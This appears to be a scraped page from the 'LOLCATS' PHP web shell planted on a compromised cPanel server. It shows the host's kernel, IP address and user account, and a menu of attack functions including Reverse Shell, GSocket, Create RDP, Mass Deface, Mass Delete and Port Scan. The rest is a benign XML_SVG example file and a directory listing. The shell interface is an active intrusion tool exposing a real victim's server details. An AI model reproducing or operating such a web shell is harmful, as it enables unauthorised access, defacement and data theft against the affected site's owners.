LOLCATS
:
/
usr
/
share
/
doc
/
cpanel-php84-xml-svg
/
docs
/
examples
/ [
drwxr-xr-x
]
Information Server
System: Linux sonos4.linuxplace.net 4.18.0-305.19.1.el8_4.x86_64 #1 SMP Wed Sep 15 11:28:53 EDT 2021 x86_64
Software: Apache/2.4.67 (cPanel) OpenSSL/1.1.1k mod_bwlimited/1.4
PHP Version: 8.3.31 PHP Os: Linux
Server IP: 46.248.185.66
Your IP: 216.73.216.102
User: truechri [1004] | Group: [truechri] [1006]
Safe Mode:
OFF
MYSQL:
OFF
| PERL:
ON
| PYTHON:
ON
| WGET:
ON
| CURL:
ON
| GCC:
ON
| PKEXEC:
ON
Disable Function:
exec,passthru,shell_exec,system
Command
ON
Config Searcher
Create RDP
Find Modified Time
Find File
Get Tools
GSocket
Jumping
Lock File
Mass Deface
Mass Delete
Mass Chmod
Mass Change Date
Port Scan
Reverse Shell
Upload
Zone-H
: basic.php
<?php /** * Basic XML_SVG Example * * @package XML_SVG */ require_once 'XML/SVG.php'; // Create an instance of XML_SVG_Document. All other objects will be // added to this instance for printing. Set the height and width of // the viewport. $svg = new XML_SVG_Document(array('width' => 200, 'height' => 200)); // Create an instance of XML_SVG_Group. Set the style, transforms for // child objects. $g = new XML_SVG_Group(array('style' => 'stroke:black', 'transform' => 'translate(100 100)')); // Add a parent to the g instance. $g->addParent($svg); // The same results can be accomplished by making g a child of the svg. // $svg->addChild($g); // Create and animate a circle. $circle = new XML_SVG_Circle(array('cx' => 0, 'cy' => 0, 'r' => 75, 'style' => 'fill:green;stroke-width:3')); $circle->addChild(new XML_SVG_Animate(array('attributeName' => 'r', 'attributeType' => 'XML', 'from' => 0, 'to' => 75, 'dur' => '3s', 'fill' => 'freeze'))); $circle->addChild(new XML_SVG_Animate(array('attributeName' => 'fill', 'attributeType' => 'CSS', 'from' => 'green', 'to' => 'red', 'dur' => '3s', 'fill' => 'freeze'))); // Make the circle a child of g. $g->addChild($circle); // Create and animate some text. $text = new XML_SVG_Text(array('text' => 'SVG chart!', 'x' => 0, 'y' => 0, 'style' => 'font-size:20;text-anchor:middle;')); $text->addChild(new XML_SVG_Animate(array('attributeName' => 'font-size', 'attributeType' => 'auto', 'from' => 0, 'to' => 20, 'dur' => '3s', 'fill' => 'freeze'))); // Make the text a child of g. $g->addChild($text); // Send a message to the svg instance to start printing. $svg->printElement();
NAME
TYPE
LAST MODIFIED
SIZE
OWNER
/
GROUP
PERMISSIONS
ACTION
..
basic.php
f!le
2025-06-06 23:42
2.48 KB
root
/
root
-rw-r--r--
radialGradient.php
f!le
2025-06-06 23:42
1.3 KB
root
/
root
-rw-r--r--
© LOLCATS